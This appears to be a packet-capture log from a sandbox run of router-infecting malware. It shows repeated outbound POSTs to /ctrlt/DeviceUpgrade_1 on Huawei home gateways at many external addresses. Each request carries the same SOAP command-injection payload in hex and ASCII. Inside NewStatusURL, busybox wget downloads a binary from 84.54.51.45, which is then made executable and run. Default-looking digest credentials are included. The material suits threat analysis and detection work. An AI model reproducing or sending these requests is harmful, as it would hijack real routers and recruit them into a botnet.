                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1431192.168.2.1547800197.95.139.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734262943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1432192.168.2.153559841.151.182.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734291077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1433192.168.2.153635641.119.89.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734329939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1434192.168.2.153561641.47.164.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734347105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1435192.168.2.155710441.119.146.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734366894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1436192.168.2.153542241.35.181.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734369040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1437192.168.2.153771441.74.204.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734401941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1438192.168.2.153692041.196.2.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734401941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1439192.168.2.153439441.203.203.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734436989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1440192.168.2.153494041.26.17.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734446049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 